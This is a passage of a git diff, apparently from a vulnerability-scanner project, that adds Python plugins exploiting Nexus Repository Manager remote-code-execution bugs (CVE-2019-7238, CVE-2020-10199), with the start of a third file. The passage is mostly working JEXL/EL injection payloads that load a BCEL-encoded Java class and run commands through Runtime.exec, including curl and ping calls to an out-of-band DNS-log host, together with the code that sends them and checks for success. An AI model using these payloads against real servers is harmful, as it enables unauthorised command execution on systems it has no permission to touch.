a$f8$B$7e$u$d0$bc$b8$e3u$fc$IS$3cL$c7$8f$f1$T$j$3f$c5$cf$E$3a$a5QL$g$c5$G$ee$X$aas$a0$a2h$3a$7e$8e_$I$d4y$c5$bc$ba$ff$l$9f$ce$bd$b2Nt$9a$90$a5$d2$f1K$fcJ$c7$af1$z$b0$ceqGc6y$92$cd$d9$b1$d3$b6$e7$9d$8b$e5lw$c2vc$95$8c$d1$f1$h$5c$e7$8d$8e$da$5e$F$F$9a$WUU$c7o$f1$bb$8at$8b7$a7$a0$a0c$G7X$3d$868V$e6M$bd$8cW$a2N$f3$e2$e6$q$Z$b6l$daB$d2$f9$ke$GI$97$e3$r$S$85$abp$88$W$f1$91T$s$3eb$e5$c6$d8$f7$h$93$K$7e$af$e3$sfu$fc$B$b7$d8$n$d59$c2N$$$x$Od$b2y$8f$Qlk$bc$a8c$H$e8$b8$8d$3f$ca$h$be$p$97$3f$95$c3$y$a1$92$8e$3fcZ$c7$5b$f8$8b$80$d0t$fcU$ee$ee$e2o$3a$fe$$$9bc$e5$7d$af$D$e9$b4$3dj$a5$7b$92$92$c1$7b$t$93v$b6H$b4$f0$7d$93$F$d2$f6$f7$60$Z$t$d9$92q$c0$aeN$e6$5d$97$dc$Y$u$N$dc$d6hW$b5$91$db$ccR$3e$c1$cb$b7X$85R$b4$8d$d1$a5$83$a7$eb$7d$u$de$98$b3$bdb$K$a9$e2$m$8e$9e$90$d3$bb$96$91$F$d6F$972$b8$ab$g$a9$95S$8e$7b$c4$g$a7$ff$9a$H$9c_$9e$d5$w$P$u$N$81p$b4$9a$81B$83b$c8$ca$e4$e7$87i$90$3d$e8O$b0H5$94$t$8a$8dv$d8$f6$c6$i$96$e5$f1$w$b0$86$97$9cZ$adP$c5$I$3c$af$e3$bdt$84$92$caL8g$Iu$7b$V$uU$a6$60$d5$g$$$e8$83c$f9$8c$97$92$a9$fb$5c$xo$o$Vu$u$89$e5$e8$b7$t$ed$a4$404Z$e5$9d$d3U$f5e$p$a7$c0$C$92$b0$3b$cb$a1$x$d9$p$b3$8eVU$c8$k$J$dfW$95$5eSR$aa$fas$ab$f82$b2$b2Y$3b$c3$falx$40S$yz$97$a9$9eS$k$mu$fe$ebv$d1$j$97$p$f0$b4$bad$da$c9$d9X$c5$ef$aa$m$bf$b7X19$b3$f9T$c3g$8es$ae$8fq$X$e7$af$e0o$5d$f7$M$c4$b4$af$de$ce5$e8$LU$q$b8$eaE$D$ec$c0N_$b6$ab$ec$i$e8$a4$dd2$c6$7es$W5C3$a8$bd$8e$c0$N$d4$j2$82$86R$80$da$b7$3eP$40$fd$fa$ee$C$b4$c3F$c3$N$e8G6$g$8d$94$t$Cf$40j$cc$c0$G$aa$ee$m$c4$bfD$9d$d1D$8bD$d0$M$g$cd$d2F1$V$df$a6$$$a1$9a$ea$edm$f5$b5$db$b4$88$W$a9$bf$s$b6$9ajD$db$9ch0$h$ee$8a$d5$a6b60FB7$f5$bb$a2$d9$d4$Lh$v$c00$c2$F$b4$5e$e1$d8$93$fbD$a3$d9hDjo$a1$ad$80vS$e7CG$Bf$od$86$a4$b2$c9l2$96$95$95$a1$b2$b2$d9$q$86$Wcy$80$8a$a1ZcE$bf$d46s$d7$c1$dd$H$b83$ef$60E$a2$85$be$P$z$f15LC$fa$7e$b0$ac0J$8a$3bX$99$I$Hoa$FC$ac$ea$l$K$Y$l$ea$l$aa3$5b$fa$T$ad7$b0$dal$z$a03$R$99$c5$9a$a1Y$ac$j2$p$F$ac$9bAt$G$5d$89$b6Yt$b3$b6$eb$T$ed$s$e3m$YJt$dcE$d8l7$Zs$a3$R$e3r$7cj$ee$j$b3$bd$80x$c24$c3$a6Y$c0$s$93$f9$3f$3c$85$ba$84$fe$a2$s$a6$de$7d$7b$K$81C$d3$bc$d8IqI$5c$c6fh$e2$aax$D$8f$m$e0_$f5U$ac$e3Z$cf$fehD$IM$fcxn$c6r$84$d99m$d4t$b0CL$f6$cdr$f4$e2$n$i$e4Go$3f5CX$8d$i$3a1$c9$af$e5$L$b4z$JQ$5cF$X$5e$c7z$5c$c7$G$be$93b$f8$t6$e1$k$k$W$3a6$8b$u$k$R$bb$b0E$3c$89$ad$e2$Zl$T6$k$TYl$X$_$60$87$b8$88$5d$e2$V$ec$W$97$d0Kt$3d$e25$ac$WW$b1$9f$I$f7$89k$3cQ$b6$e0$3bhg$ec$7b$d8$8d$P$T$e5u$fc$h$8f$a3$87ho$e2_$d8CY$TO$7b$8b$I$7b$88$fd$k$z$9f$c0$5e$b4$f0$e4$8b$d8G$99$c1$f3$cf$e0I$ecG$98$u$Gq$80Q$5b$89$a5$P$87$f8$3fBD$8f$e20$8e$a0$8d$b8bx$KG$d1$$$c6$99$d9G$Y$a5$83$f8t$i$e3$93$89$L$c2$60$f6$3d$dc$e7$c4$g$M$f0$a9$B$n$f1j$89Wm$e2e$3c$cd$e8$C$ab$c4$f38Nm$N$d6$89$b3$f8$u$f1$d5$o$$$iVm$905$ef$V$c38$81a$S$ea$a0$Y$c03$d4$G$d1$_$O$e1c$d4$w$f8$b8$8cD$cfb$b6$cf2$dbb$8e$cf2$c7OP7$8d$fa9$d8hP$60$v$YQ$c0o$80$93$feCh$feA$90$aes$fc$d7$f1$be6$be$b8$a8$99_m$7f$3d$a5$60T$c1$98$82$94$82$d3$c0$7f$b1$8c$9a9$Y$d0$l$U$Q$d8$a3$e0$cc$7f$m$e6$98$j$fc$5dZ$8e$9eq$7f$aed$fe$H$c3$e0$Q$5e$fb$N$A$A').newInstance()"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}''',
+                'headers': {'404': RCEcommand}
+            },
+            # * 无回显POC
+            {
+                'path': 'service/extdirect',
+                'data': '''{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('curl DNSDOMAIN')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}''',
+                'headers': {}
+            },
+            {
+                'path': 'service/extdirect',
+                'data': '''{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('ping -c 4 DNSDOMAIN')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}''',
+                'headers': {}
+            },
+            {
+                'path': 'service/extdirect',
+                'data': '''{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('ping DNSDOMAIN')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}''',
+                'headers': {}
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '2649e3a08398e1940ab6b95a7f9a20a5'
+
+        vul_info = {
+            'app_name': 'Nexus',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2019-7238',
+        }
+
+        base_headers = {
+            'Content-Type': 'application/json',
+            'X-Requested-With': 'XMLHttpRequest'
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+            
+            path = payload['path']
+            data = payload['data'].replace('DNSDOMAIN', dns_domain)
+            headers = payload['headers']
+            
+            merge_headers = head.merge(base_headers, headers)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=merge_headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if ((check.check_res(res.text, self.random_str))     # * 可以运行命令, 有回显
+                or (dns.result(md, sessid))                 # * 可以运行命令, 无回显
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Nexus/nexus-cve-2020-10199-rce.py b/payloads/Nexus/nexus-cve-2020-10199-rce.py
new file mode 100644
index 0000000..e36f4b5
--- /dev/null
+++ b/payloads/Nexus/nexus-cve-2020-10199-rce.py
@@ -0,0 +1,114 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Nexus Repository Manager 3 远程命令执行
+    CVE-2020-10199
+        Payload: https://vulhub.org/#/environments/nexus/CVE-2020-10199/
+                 https://github.com/aleenzz/CVE-2020-10199
+
+3.21.1及之前版本中, 存在一处任意EL表达式注入漏洞
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5, random_int_1
+from lib.tool import head
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.random_str = random_md5(6)
+        RCEcommand = 'echo ' + self.random_str
+
+        random_num = random_int_1()
+        self.random_num_sum = str(random_num * random_num)
+
+        self.payloads = [
+            {
+                'path': 'service/rest/beta/repositories/go/group',
+                'data': '''{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["${' '.getClass().forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$eb$7f$UW$Z$7eN$b2$d9$99L$s$9bd6$9bd$A$xH$80M$80$5dJ$81$96$e5bC$K$e5$S$u$924$YR$ad$93eH$W6$3b$db$d9$d9$Q$d0j$d1Z$ea$adVQ$yj$d1R5$de5$a2$h$q$82h$V$b5$9f$fc$ea7$3f$f6$_$e0$83$3f$7f$8d$cf$99$dd$N$d9d$5b$fc$R$ce$ceyo$e7y$df$f3$3e$ef$cc$db$ef$de$bc$N$60$L$fe$a1$n$IGAVC$N$9cz$$$cfI$89$ab$m$a7$e2i$Nm$f04$e41$n$97$b3$w$s$a5$e4$9c$8a$f3$K$86U$7cR$c5$a74t$e0y$v$fd$b4$8a$cfhX$81$XT$5cP$f0Y$v$fa$9c$82$X5$7c$k$_$a9$b8$a8$e2e$F_P$f1E$V_R$f1e$F_Q$f1$8a$8a$afjx$V_$93$cb$d7$V$5cR$f0$N$N$df$c4e$Nk$f1$z$Nk$f0$9a$82$x$g$ba$e1$c8$cd$b7$e5$d3wT$7cW$fe$be$aea$r$ae$ca$e5$7b$K$be$af$e0$N$81$a07$e6$da$d6I$B$a3$ef$b45a$c5$d3Vf4$3e$e0$cbvP$bb3$95Iy$bb$Fj$a3$5d$83$C$81$5e$e7$a4$z$d0$d4$97$ca$d8G$f2$e3$p$b6$3b$60$8d$a4m$e9$ec$q$ad$f4$a0$e5$a6$e4$be$q$Mxc$a9$9c$40C$9f$3d$91J$c7$e5$c2$88$ea$ced$ba$U3$b4$df$f3$b2$bdN$sc$t$bd$94$93$RhY$A$a17m$e5r$b4o$Y$93Fc$W$ad$d2$95$m$9f$g9MGi$b2$7f$a1$89$e2$da$cf$e5$ed$9cG$f0cL$c2v$x$bd$fa$3d7$95$Z$95$40$5c$3b$97u29$C$N$9euS$9e4$8c$U$NSN$fc$u$ad$bc$e3$be$98$b6$b5$c9qV$u$3c$5c$zNM$969$86$Xh$8e$baN$d2$f6$b1$d7$8c0f$c7$7c$cc$3d$f9S$a7l$d7$3ey$cc$87$r$f5$b9$91y$fd$82$a0E$3b$ea$D$ac$94$84G$a4$f94$T$K$8d$z$wX$d0$f1k$m$a0$Xo$d1$bf$F$c21$X$c4t$edSi$da$c4$f7$a5$ec$b4$bc$d2$d0$C$d3$c3V$96$d8$x$F$y$fc$f9$f3$C$9a$t$_$d1wbM$8b$e7$e4$W$d5$60$fe$G4$3b$e3$b9$e7$fc$xcw$f8$9bA$x$9d$_$bb$b7Uv$c7$b9l$b9CZ$X_$f8$ce$ee$dd$M$d7$d8$efY$c93$c4$e2$9b$91U$K$ae$91$V$q$I$d9$40$S$u8$a8$e0M$bf$f5$af$94$fbX$ebw$f2n$92$t$ca$b8$f5$b2$d9b2$b6$8emx$b4$q$f0$5bP$t$7f$b7$ea$f8$B$7e$u$d0$bc$b8$e3u$fc$IS$3cL$c7$8f$f1$T$j$3f$c5$cf$E$3a$a5QL$g$c5$G$ee$X$aas$a0$a2h$3a$7e$8e_$I$d4y$c5$bc$ba$ff$l$9f$ce$bd$b2Nt$9a$90$a5$d2$f1K$fcJ$c7$af1$z$b0$ceqGc6y$92$cd$d9$b1$d3$b6$e7$9d$8b$e5lw$c2vc$95$8c$d1$f1$h$5c$e7$8d$8e$da$5e$F$F$9a$WUU$c7o$f1$bb$8at$8b7$a7$a0$a0c$G7X$3d$868V$e6M$bd$8cW$a2N$f3$e2$e6$q$Z$b6l$daB$d2$f9$ke$GI$97$e3$r$S$85$abp$88$W$f1$91T$s$3eb$e5$c6$d8$f7$h$93$K$7e$af$e3$sfu$fc$B$b7$d8$n$d59$c2N$$$x$Od$b2y$8f$Qlk$bc$a8c$H$e8$b8$8d$3f$ca$h$be$p$97$3f$95$c3$y$a1$92$8e$3fcZ$c7$5b$f8$8b$80$d0t$fcU$ee$ee$e2o$3a$fe$$$9bc$e5$7d$af$D$e9$b4$3dj$a5$7b$92$92$c1$7b$t$93v$b6H$b4$f0$7d$93$F$d2$f6$f7$60$Z$t$d9$92q$c0$aeN$e6$5d$97$dc$Y$u$N$dc$d6hW$b5$91$db$ccR$3e$c1$cb$b7X$85R$b4$8d$d1$a5$83$a7$eb$7d$u$de$98$b3$bdb$K$a9$e2$m$8e$9e$90$d3$bb$96$91$F$d6F$972$b8$ab$g$a9$95S$8e$7b$c4$g$a7$ff$9a$H$9c_$9e$d5$w$P$u$N$81p$b4$9a$81B$83b$c8$ca$e4$e7$87i$90$3d$e8O$b0H5$94$t$8a$8dv$d8$f6$c6$i$96$e5$f1$w$b0$86$97$9cZ$adP$c5$I$3c$af$e3$bdt$84$92$caL8g$Iu$7b$V$uU$a6$60$d5$g$$$e8$83c$f9$8c$97$92$a9$fb$5c$xo$o$Vu$u$89$e5$e8$b7$t$ed$a4$404Z$e5$9d$d3U$f5e$p$a7$c0$C$92$b0$3b$cb$a1$x$d9$p$b3$8eVU$c8$k$J$dfW$95$5eSR$aa$fas$ab$f82$b2$b2Y$3b$c3$falx$40S$yz$97$a9$9eS$k$mu$fe$ebv$d1$j$97$p$f0$b4$bad$da$c9$d9X$c5$ef$aa$m$bf$b7X19$b3$f9T$c3g$8es$ae$8fq$X$e7$af$e0o$5d$f7$M$c4$b4$af$de$ce5$e8$LU$q$b8$eaE$D$ec$c0N_$b6$ab$ec$i$e8$a4$dd2$c6$7es$W5C3$a8$bd$8e$c0$N$d4$j2$82$86R$80$da$b7$3eP$40$fd$fa$ee$C$b4$c3F$c3$N$e8G6$g$8d$94$t$Cf$40j$cc$c0$G$aa$ee$m$c4$bfD$9d$d1D$8bD$d0$M$g$cd$d2F1$V$df$a6$$$a1$9a$ea$edm$f5$b5$db$b4$88$W$a9$bf$s$b6$9ajD$db$9ch0$h$ee$8a$d5$a6b60FB7$f5$bb$a2$d9$d4$Lh$v$c00$c2$F$b4$5e$e1$d8$93$fbD$a3$d9hDjo$a1$ad$80vS$e7CG$Bf$od$86$a4$b2$c9l2$96$95$95$a1$b2$b2$d9$q$86$Wcy$80$8a$a1ZcE$bf$d46s$d7$c1$dd$H$b83$ef$60E$a2$85$be$P$z$f15LC$fa$7e$b0$ac0J$8a$3bX$99$I$Hoa$FC$ac$ea$l$K$Y$l$ea$l$aa3$5b$fa$T$ad7$b0$dal$z$a03$R$99$c5$9a$a1Y$ac$j2$p$F$ac$9bAt$G$5d$89$b6Yt$b3$b6$eb$T$ed$s$e3m$YJt$dcE$d8l7$Zs$a3$R$e3r$7cj$ee$j$b3$bd$80x$c24$c3$a6Y$c0$s$93$f9$3f$3c$85$ba$84$fe$a2$s$a6$de$7d$7b$K$81C$d3$bc$d8IqI$5c$c6fh$e2$aax$D$8f$m$e0_$f5U$ac$e3Z$cf$fehD$IM$fcxn$c6r$84$d99m$d4t$b0CL$f6$cdr$f4$e2$n$i$e4Go$3f5CX$8d$i$3a1$c9$af$e5$L$b4z$JQ$5cF$X$5e$c7z$5c$c7$G$be$93b$f8$t6$e1$k$k$W$3a6$8b$u$k$R$bb$b0E$3c$89$ad$e2$Zl$T6$k$TYl$X$_$60$87$b8$88$5d$e2$V$ec$W$97$d0Kt$3d$e25$ac$WW$b1$9f$I$f7$89k$3cQ$b6$e0$3bhg$ec$7b$d8$8d$P$T$e5u$fc$h$8f$a3$87ho$e2_$d8CY$TO$7b$8b$I$7b$88$fd$k$z$9f$c0$5e$b4$f0$e4$8b$d8G$99$c1$f3$cf$e0I$ecG$98$u$Gq$80Q$5b$89$a5$P$87$f8$3fBD$8f$e20$8e$a0$8d$b8bx$KG$d1$$$c6$99$d9G$Y$a5$83$f8t$i$e3$93$89$L$c2$60$f6$3d$dc$e7$c4$g$M$f0$a9$B$n$f1j$89Wm$e2e$3c$cd$e8$C$ab$c4$f38Nm$N$d6$89$b3$f8$u$f1$d5$o$$$iVm$905$ef$V$c38$81a$S$ea$a0$Y$c03$d4$G$d1$_$O$e1c$d4$w$f8$b8$8cD$cfb$b6$cf2$dbb$8e$cf2$c7OP7$8d$fa9$d8hP$60$v$YQ$c0o$80$93$feCh$feA$90$aes$fc$d7$f1$be6$be$b8$a8$99_m$7f$3d$a5$60T$c1$98$82$94$82$d3$c0$7f$b1$8c$9a9$Y$d0$l$U$Q$d8$a3$e0$cc$7f$m$e6$98$j$fc$5dZ$8e$9eq$7f$aed$fe$H$c3$e0$Q$5e$fb$N$A$A').newInstance()}"]}}''',
+                'headers': {'404': RCEcommand}
+            },
+            {
+                'path': 'service/rest/beta/repositories/go/group',
+                'data': '''{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\\\C{' '.getClass().forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$eb$7f$UW$Z$7eN$b2$d9$99L$s$9bd6$9bd$A$xH$80M$80$5dJ$81$96$e5bC$K$e5$S$u$924$YR$ad$93eH$W6$3b$db$d9$d9$Q$d0j$d1Z$ea$adVQ$yj$d1R5$de5$a2$h$q$82h$V$b5$9f$fc$ea7$3f$f6$_$e0$83$3f$7f$8d$cf$99$dd$N$d9d$5b$fc$R$ce$ceyo$e7y$df$f3$3e$ef$cc$db$ef$de$bc$N$60$L$fe$a1$n$IGAVC$N$9cz$$$cfI$89$ab$m$a7$e2i$Nm$f04$e41$n$97$b3$w$s$a5$e4$9c$8a$f3$K$86U$7cR$c5$a74t$e0y$v$fd$b4$8a$cfhX$81$XT$5cP$f0Y$v$fa$9c$82$X5$7c$k$_$a9$b8$a8$e2e$F_P$f1E$V_R$f1e$F_Q$f1$8a$8a$afjx$V_$93$cb$d7$V$5cR$f0$N$N$df$c4e$Nk$f1$z$Nk$f0$9a$82$x$g$ba$e1$c8$cd$b7$e5$d3wT$7cW$fe$be$aea$r$ae$ca$e5$7b$K$be$af$e0$N$81$a07$e6$da$d6I$B$a3$ef$b45a$c5$d3Vf4$3e$e0$cbvP$bb3$95Iy$bb$Fj$a3$5d$83$C$81$5e$e7$a4$z$d0$d4$97$ca$d8G$f2$e3$p$b6$3b$60$8d$a4m$e9$ec$q$ad$f4$a0$e5$a6$e4$be$q$Mxc$a9$9c$40C$9f$3d$91J$c7$e5$c2$88$ea$ced$ba$U3$b4$df$f3$b2$bdN$sc$t$bd$94$93$RhY$A$a17m$e5r$b4o$Y$93Fc$W$ad$d2$95$m$9f$g9MGi$b2$7f$a1$89$e2$da$cf$e5$ed$9cG$f0cL$c2v$x$bd$fa$3d7$95$Z$95$40$5c$3b$97u29$C$N$9euS$9e4$8c$U$NSN$fc$u$ad$bc$e3$be$98$b6$b5$c9qV$u$3c$5c$zNM$969$86$Xh$8e$baN$d2$f6$b1$d7$8c0f$c7$7c$cc$3d$f9S$a7l$d7$3ey$cc$87$r$f5$b9$91y$fd$82$a0E$3b$ea$D$ac$94$84G$a4$f94$T$K$8d$z$wX$d0$f1k$m$a0$Xo$d1$bf$F$c21$X$c4t$edSi$da$c4$f7$a5$ec$b4$bc$d2$d0$C$d3$c3V$96$d8$x$F$y$fc$f9$f3$C$9a$t$_$d1wbM$8b$e7$e4$W$d5$60$fe$G4$3b$e3$b9$e7$fc$xcw$f8$9bA$x$9d$_$bb$b7Uv$c7$b9l$b9CZ$X_$f8$ce$ee$dd$M$d7$d8$efY$c93$c4$e2$9b$91U$K$ae$91$V$q$I$d9$40$S$u8$a8$e0M$bf$f5$af$94$fbX$ebw$f2n$92$t$ca$b8$f5$b2$d9b2$b6$8emx$b4$q$f0$5bP$t$7f$b7$ea$f8$B$7e$u$d0$bc$b8$e3u$fc$IS$3cL$c7$8f$f1$T$j$3f$c5$cf$E$3a$a5QL$g$c5$G$ee$X$aas$a0$a2h$3a$7e$8e_$I$d4y$c5$bc$ba$ff$l$9f$ce$bd$b2Nt$9a$90$a5$d2$f1K$fcJ$c7$af1$z$b0$ceqGc6y$92$cd$d9$b1$d3$b6$e7$9d$8b$e5lw$c2vc$95$8c$d1$f1$h$5c$e7$8d$8e$da$5e$F$F$9a$WUU$c7o$f1$bb$8at$8b7$a7$a0$a0c$G7X$3d$868V$e6M$bd$8cW$a2N$f3$e2$e6$q$Z$b6l$daB$d2$f9$ke$GI$97$e3$r$S$85$abp$88$W$f1$91T$s$3eb$e5$c6$d8$f7$h$93$K$7e$af$e3$sfu$fc$B$b7$d8$n$d59$c2N$$$x$Od$b2y$8f$Qlk$bc$a8c$H$e8$b8$8d$3f$ca$h$be$p$97$3f$95$c3$y$a1$92$8e$3fcZ$c7$5b$f8$8b$80$d0t$fcU$ee$ee$e2o$3a$fe$$$9bc$e5$7d$af$D$e9$b4$3dj$a5$7b$92$92$c1$7b$t$93v$b6H$b4$f0$7d$93$F$d2$f6$f7$60$Z$t$d9$92q$c0$aeN$e6$5d$97$dc$Y$u$N$dc$d6hW$b5$91$db$ccR$3e$c1$cb$b7X$85R$b4$8d$d1$a5$83$a7$eb$7d$u$de$98$b3$bdb$K$a9$e2$m$8e$9e$90$d3$bb$96$91$F$d6F$972$b8$ab$g$a9$95S$8e$7b$c4$g$a7$ff$9a$H$9c_$9e$d5$w$P$u$N$81p$b4$9a$81B$83b$c8$ca$e4$e7$87i$90$3d$e8O$b0H5$94$t$8a$8dv$d8$f6$c6$i$96$e5$f1$w$b0$86$97$9cZ$adP$c5$I$3c$af$e3$bdt$84$92$caL8g$Iu$7b$V$uU$a6$60$d5$g$$$e8$83c$f9$8c$97$92$a9$fb$5c$xo$o$Vu$u$89$e5$e8$b7$t$ed$a4$404Z$e5$9d$d3U$f5e$p$a7$c0$C$92$b0$3b$cb$a1$x$d9$p$b3$8eVU$c8$k$J$dfW$95$5eSR$aa$fas$ab$f82$b2$b2Y$3b$c3$falx$40S$yz$97$a9$9eS$k$mu$fe$ebv$d1$j$97$p$f0$b4$bad$da$c9$d9X$c5$ef$aa$m$bf$b7X19$b3$f9T$c3g$8es$ae$8fq$X$e7$af$e0o$5d$f7$M$c4$b4$af$de$ce5$e8$LU$q$b8$eaE$D$ec$c0N_$b6$ab$ec$i$e8$a4$dd2$c6$7es$W5C3$a8$bd$8e$c0$N$d4$j2$82$86R$80$da$b7$3eP$40$fd$fa$ee$C$b4$c3F$c3$N$e8G6$g$8d$94$t$Cf$40j$cc$c0$G$aa$ee$m$c4$bfD$9d$d1D$8bD$d0$M$g$cd$d2F1$V$df$a6$$$a1$9a$ea$edm$f5$b5$db$b4$88$W$a9$bf$s$b6$9ajD$db$9ch0$h$ee$8a$d5$a6b60FB7$f5$bb$a2$d9$d4$Lh$v$c00$c2$F$b4$5e$e1$d8$93$fbD$a3$d9hDjo$a1$ad$80vS$e7CG$Bf$od$86$a4$b2$c9l2$96$95$95$a1$b2$b2$d9$q$86$Wcy$80$8a$a1ZcE$bf$d46s$d7$c1$dd$H$b83$ef$60E$a2$85$be$P$z$f15LC$fa$7e$b0$ac0J$8a$3bX$99$I$Hoa$FC$ac$ea$l$K$Y$l$ea$l$aa3$5b$fa$T$ad7$b0$dal$z$a03$R$99$c5$9a$a1Y$ac$j2$p$F$ac$9bAt$G$5d$89$b6Yt$b3$b6$eb$T$ed$s$e3m$YJt$dcE$d8l7$Zs$a3$R$e3r$7cj$ee$j$b3$bd$80x$c24$c3$a6Y$c0$s$93$f9$3f$3c$85$ba$84$fe$a2$s$a6$de$7d$7b$K$81C$d3$bc$d8IqI$5c$c6fh$e2$aax$D$8f$m$e0_$f5U$ac$e3Z$cf$fehD$IM$fcxn$c6r$84$d99m$d4t$b0CL$f6$cdr$f4$e2$n$i$e4Go$3f5CX$8d$i$3a1$c9$af$e5$L$b4z$JQ$5cF$X$5e$c7z$5c$c7$G$be$93b$f8$t6$e1$k$k$W$3a6$8b$u$k$R$bb$b0E$3c$89$ad$e2$Zl$T6$k$TYl$X$_$60$87$b8$88$5d$e2$V$ec$W$97$d0Kt$3d$e25$ac$WW$b1$9f$I$f7$89k$3cQ$b6$e0$3bhg$ec$7b$d8$8d$P$T$e5u$fc$h$8f$a3$87ho$e2_$d8CY$TO$7b$8b$I$7b$88$fd$k$z$9f$c0$5e$b4$f0$e4$8b$d8G$99$c1$f3$cf$e0I$ecG$98$u$Gq$80Q$5b$89$a5$P$87$f8$3fBD$8f$e20$8e$a0$8d$b8bx$KG$d1$$$c6$99$d9G$Y$a5$83$f8t$i$e3$93$89$L$c2$60$f6$3d$dc$e7$c4$g$M$f0$a9$B$n$f1j$89Wm$e2e$3c$cd$e8$C$ab$c4$f38Nm$N$d6$89$b3$f8$u$f1$d5$o$$$iVm$905$ef$V$c38$81a$S$ea$a0$Y$c03$d4$G$d1$_$O$e1c$d4$w$f8$b8$8cD$cfb$b6$cf2$dbb$8e$cf2$c7OP7$8d$fa9$d8hP$60$v$YQ$c0o$80$93$feCh$feA$90$aes$fc$d7$f1$be6$be$b8$a8$99_m$7f$3d$a5$60T$c1$98$82$94$82$d3$c0$7f$b1$8c$9a9$Y$d0$l$U$Q$d8$a3$e0$cc$7f$m$e6$98$j$fc$5dZ$8e$9eq$7f$aed$fe$H$c3$e0$Q$5e$fb$N$A$A').newInstance()}"]}}''',
+                'headers': {'404': RCEcommand}
+            },
+            {
+                'path': 'service/rest/beta/repositories/go/group',
+                'data': '''{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\\\C{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('curl DNSDOMAIN')}"]}}''',
+                'headers': {}
+            },
+            {
+                'path': 'service/rest/beta/repositories/go/group',
+                'data': '''{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\\\C{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('ping -c 4 DNSDOMAIN')}"]}}''',
+                'headers': {}
+            },
+            {
+                'path': 'service/rest/beta/repositories/go/group',
+                'data': '''{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\\\C{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('ping DNSDOMAIN')}"]}}''',
+                'headers': {}
+            },
+            {
+                'path': 'service/rest/beta/repositories/go/group',
+                'data': '''{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\\\C{NUM*NUM}"]}}'''.replace('NUM', str(random_num)),
+                'headers': {}
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '429d9e16ee5d3c8fd4575342bf02b72e'
+
+        vul_info = {
+            'app_name': 'Nexus',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2020-10199',
+        }
+
+        base_headers = {
+            'Content-Type': 'application/json',
+            'X-Requested-With': 'XMLHttpRequest',
+            'Referer': client.protocol_domain,
+            'Origin': client.protocol_domain,
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+
+            path = payload['path']
+            data = payload['data'].replace('DNSDOMAIN', dns_domain)
+            headers = payload['headers']
+
+            merge_headers = head.merge(base_headers, headers)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=merge_headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if ((check.check_res(res.text, self.random_str))  # * 可以运行命令, 有回显
+                or (dns.result(md, sessid))              # * 可以运行命令, 无回显
+                or (self.random_num_sum in res.text)          # * 可以执行EL表达式
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Nexus/nexus-cve-2020-10204-rce.py b/payloads/Nexus/nexus-cve-2020-10204-rce.py
new file mode 100644
index 0000000..8d7e0ba
--- /dev/null
+++ b/payloads/Nexus/nexus-cve-2020-10204-rce.py
@@ -0,0 +1,113 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Nexus Repository Manager 3 远程命令执行
+    CVE-2020-10204
+        Payload: https://vulhub.org/#/environments/nexus/CVE-2020-10204/
